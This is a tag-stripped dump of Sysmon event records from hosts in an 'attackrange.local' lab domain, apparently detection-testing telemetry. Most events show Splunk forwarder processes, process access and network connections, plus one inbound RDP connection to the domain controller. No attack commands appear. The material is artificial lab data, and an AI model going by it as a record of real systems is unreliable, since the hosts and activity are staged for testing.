10341000x80000000000000001054708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.641{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F857-60EB-F47D-00000000CF01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.637{466BC892-F857-60EB-F47D-00000000CF01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.620{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3487712212761D1B7B016EF7195EA823,SHA256=C24F690F898EF185FD0E5A52F2368F4B08024FACBF0537735BBA1292AE7C76B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810400Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:51.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5391DDC1C3D2C5CF5C90B6341F6C71D2,SHA256=3A4A526E8246EE0B40E3808EB789D7B857A5599669476168A4F48051B57E72AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=228704EB42040B39A7D7F3D18812C1AB,SHA256=6F691244E5F43DA38D787A3706E036827B4CE496D1145E228CDF24F5D2ED7448,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:44.761{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61969-false10.0.1.12-8000- 354300x80000000000000001054735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:44.588{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-64873-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001054734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.842{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F858-60EB-F67D-00000000CF01}5404C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.842{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:52.842{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.842{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:52.842{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.842{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F858-60EB-F67D-00000000CF01}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.842{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F858-60EB-F67D-00000000CF01}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.838{466BC892-F858-60EB-F67D-00000000CF01}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.674{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFA7BB66E6085927114A29873E0B38C7,SHA256=90C381CEE72D18EB1440752827D558A88E5676B8BE86F397668A0CCA64B2C4B3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.642{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C74EE54ED021B392FD8567427D606ABD,SHA256=760162B282AEE1EB409ED641440D28EE4C3F0ECA52F7D7D46855A283BC21658A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810402Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:51.322{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57464-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810401Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:52.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21B53E4A4584E8ABC2E63D569D52FB72,SHA256=2F7CDA5B46FDBEB10672AEB9E41A72738A66623149D4AFA904AC9BD7CD5BA8F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.589{466BC892-F858-60EB-F57D-00000000CF01}5720764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.320{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F858-60EB-F57D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.320{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:52.320{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.304{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:52.304{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.304{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F858-60EB-F57D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.304{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F858-60EB-F57D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.305{466BC892-F858-60EB-F57D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.858{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65024B8EB17F8F9B94DD00541D8AB452,SHA256=52747A34AC3B4FAEBA4F178BB224F34A73BA6A2F1708D2067251635C484AE270,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:53.742{466BC892-F859-60EB-F77D-00000000CF01}286010044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.674{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=367F6353ECEFAFBEA1D9A4ED89906BEC,SHA256=3FD08A804598E82BD637B9014819D1D713478065D8839B162E733437D32F9189,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810403Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:53.345{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=773B0ED856491C781C842661B2CDC08D,SHA256=2FADD7CB185CDC33DA1234F368C19EA8A4CD36441247D9819BBA821F07072F7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F859-60EB-F77D-00000000CF01}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
